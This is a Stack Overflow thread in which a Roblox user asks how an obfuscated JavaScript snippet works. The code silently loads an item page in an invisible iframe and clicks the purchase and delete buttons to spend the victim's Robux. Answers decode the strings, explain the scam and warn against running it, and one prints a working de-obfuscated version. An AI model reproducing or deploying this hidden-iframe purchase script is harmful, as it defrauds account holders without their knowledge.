# Can someone tell me how this code works?

Tags: javascript, google-chrome, iframe

I'm a user on the game [Roblox](http://roblox.com) and someone gave me this to run. I know it's bad because I disabled the part that would take someone's money by buying the tshirt, which is the line on the bottom of the code that reads `/*iframe[_0xebe7[20]] = whe;*/`.

How does the variable `_0x2d54` even work? I've never seen this type of coding before and it puzzles me because I want to understand it.

I'm not sure how the hex coding works, but I came across a similar post: [Decode this strange Javascript](https://stackoverflow.com/questions/9045701/decode-this-strange-javascript)

```
var _0x2d54=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x6F\x62\x6C\x6F\x78\x2E\x63\x6F\x6D\x2F\x66\x6F\x72\x2D\x74\x72\x61\x64\x65\x73\x2D\x69\x74\x65\x6D\x3F\x69\x64\x3D\x36\x37\x39\x32\x38\x39\x31\x38","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x75\x72\x63\x68\x61\x73\x65\x57\x69\x74\x68\x52\x6F\x62\x75\x78\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x72\x6F\x63\x65\x65\x64\x57\x69\x74\x68\x50\x75\x72\x63\x68\x61\x73\x65\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x62\x74\x6E\x44\x65\x6C\x65\x74\x65","\x77\x69\x64\x74\x68","\x31","\x68\x65\x69\x67\x68\x74","\x7A\x2D\x69\x6E\x64\x65\x78","\x73\x74\x79\x6C\x65","\x2D\x31","\x63\x6F\x6E\x74\x65\x6E\x74\x44\x6F\x63\x75\x6D\x65\x6E\x74","\x69\x66\x72\x61\x6D\x65\x20\x6C\x6F\x61\x64\x65\x64","\x6C\x6F\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6E\x66\x69\x72\x6D\x44\x65\x6C\x65\x74\x65","\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77","\x63\x6C\x69\x63\x6B","\x73\x72\x63","\x6F\x6E\x6C\x6F\x61\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
var _0xebe7=[_0x2d54[0],_0x2d54[1],_0x2d54[2],_0x2d54[3],_0x2d54[4],_0x2d54[5],_0x2d54[6],_0x2d54[7],_0x2d54[8],_0x2d54[9],_0x2d54[10],_0x2d54[11],_0x2d54[12],_0x2d54[13],_0x2d54[14],_0x2d54[15],_0x2d54[16],_0x2d54[17],_0x2d54[18],_0x2d54[19],_0x2d54[20],_0x2d54[21],_0x2d54[22]];
var shirt=_0xebe7[0];
var iframe=document[_0xebe7[2]](_0xebe7[1]);
var b1=_0xebe7[3];
var b2=_0xebe7[4];
var b3 =_0xebe7[5];
iframe[_0xebe7[6]] = _0xebe7[7];
iframe[_0xebe7[8]] = _0xebe7[7];
iframe[_0xebe7[10]][_0xebe7[9]] = _0xebe7[11];

function whe(){
    var _0x9b91x8 = iframe[_0xebe7[12]]; 
    console[_0xebe7[14]](_0xebe7[13]);
    if (_0x9b91x8[_0xebe7[15]](b3)){
        iframe[_0xebe7[17]][_0xebe7[16]] = (function (){
            return function (){
                return true;
            } 
        ;} 
        )();
        iframe[_0xebe7[12]][_0xebe7[15]](b3)[_0xebe7[18]]();
    } else {
        if(_0x9b91x8[_0xebe7[15]](b2)){
            iframe[_0xebe7[12]][_0xebe7[15]](b2)[_0xebe7[18]]();
        } else {
            if(_0x9b91x8[_0xebe7[15]](b1)){
                iframe[_0xebe7[12]][_0xebe7[15]](b1)[_0xebe7[18]]();
            } 
        } 
    } 
} 
iframe[_0xebe7[19] ]= shirt;
/*iframe[_0xebe7[20]] = whe;*/
document[_0xebe7[22]][_0xebe7[21]](iframe);
```

Comment: Its obfuscated you can `console.log(_0xebe7)` to see all the values of the variables. To get the values and improve readability a bit you can use http://jsbeautifier.org

Comment: Which part don't you understand? The hex escapes?

Comment: perhaps the code was lifted from somewhere, and the source had it "minified". so whoever got it, went through it and tried to make it more readable.

Comment: It's the hex code I dont understand. Ill edit above.

Comment: Like @JordanDoyle said, it's been obfuscated.

Comment: `var _0xebe7 = ['http://www.roblox.com/for-trades-item?id=67928918', 'iframe', 'createElement', 'ctl00_cphRoblox_PurchaseWithRobuxButton', 'ctl00_cphRoblox_ProceedWithPurchaseButton', 'ctl00_cphRoblox_btnDelete', 'width', '1', 'height', 'z-index', 'style', '-1', 'contentDocument', 'iframe loaded', 'log', 'getElementById', 'confirmDelete', 'contentWindow', 'click', 'src', 'onload', 'appendChild', 'body'];`

Comment: Alright, thanks guys. I understand it now by using http://jsbeautifier.org/

Answer (score 3, accepted):

You'll have to work hard to understand this code.  The developers made it hard to understand -- on purpose.

They obfuscated the code to slow down others who would copy it.

<strike>You can start by changing the variables and running the code to see what changes.  That will give you hints as to what that particular variable does.  But there are lots of variables.</strike>

**Edit:**  Actually, I take that back.  Try to understand the code as much as you can first **without** running it.  As Mathew points out below, it could be malware.  Then, once you have a better idea, poke it carefully.

Comment: `You can start by changing the variables and running the code to see what changes.` I would highly recommend that no one runs this code. Especially if they have a roblox.com account.

Comment: Agree 100% @MathewFoscarini.  That angle didn't even occur to me.

Comment: @MathewFoscarini: Running it in an incognito window should be fairly safe.

Answer (score 2):

It contains an array of multiple values.

```
[
    "http://www.roblox.com/for-trades-item?id=67928918", 
    "iframe", 
    "createElement", 
    "ctl00_cphRoblox_PurchaseWithRobuxButton", 
    "ctl00_cphRoblox_ProceedWithPurchaseButton", 
    "ctl00_cphRoblox_btnDelete", 
    "width", 
    "1", 
    "height", 
    "z-index", 
    "style", 
    "-1", 
    "contentDocument", 
    "iframe loaded", 
    "log", 
    "getElementById", 
    "confirmDelete", 
    "contentWindow", 
    "click", 
    "src", 
    "onload", 
    "appendChild", 
    "body"
]
```

Looks to me like this is a nasty script and you shouldn't run it.

Comment: +1 for "don't run the script."  I didn't think of that angle.

Comment: @John yea, nasty stuff. Looks like the victom has to already have a roblox.com account, but it will try to purchase a tshirt in a zero sized iframe without you knowing. Luckily, roblox.com has taken down the item and it's no longer for sale. I really don't think 75 people purchased the t-shirt willingly.

Answer (score 2):

Basically, it adds an invisibile `iframe` to the current page with `http://www.roblox.com/for-trades-item?id=67928918` as the source.  It then attempts to:

1. Click the "Delete" button without a confirmation
2. Click the "Purchase" button
3. Click the "Robux" button

A lot of browsers protect you from code generated click events like this, but you still shouldn't run it.

De-obfuscated:

```
var iframe = document.createElement("iframe");
iframe.width = 1;
iframe.heigth = 1;
iframe.style.zIndex = -1;
iframe.src = "http://www.roblox.com/for-trades-item?id=67928918";

function whe() {
  var cDoc = iframe.contentDocument;
  console.log("iframe loaded");

  if (cDoc.getElementById("ctl00_cphRoblox_btnDelete")) {
    iframe.contentWindow.confirmDelete = (function () {
      return function () {
        return true;
      };
    })();

    iframe.contentDocument.getElementById("ctl00_cphRoblox_btnDelete").click();

  } else {
    if (cDoc.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton")) {
      iframe.contentDocument.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton").click();
    } else {
      if (cDoc.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton")) {
        iframe.contentDocument.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton").click();
      }
    }
  }
}

iframe.onload = whe;

document.body.appendChild(iframe);
```

Comment: Yeah I knew what it did and how it achieved it, but I didnt know how to read the code.

Answer (score 0):

My comment is probably going to get removed because it's an answer not a comment.

Its obfuscated you can console.log(_0xebe7) to see all the values of the variables. To get the values and improve readability a bit you can use http://jsbeautifier.org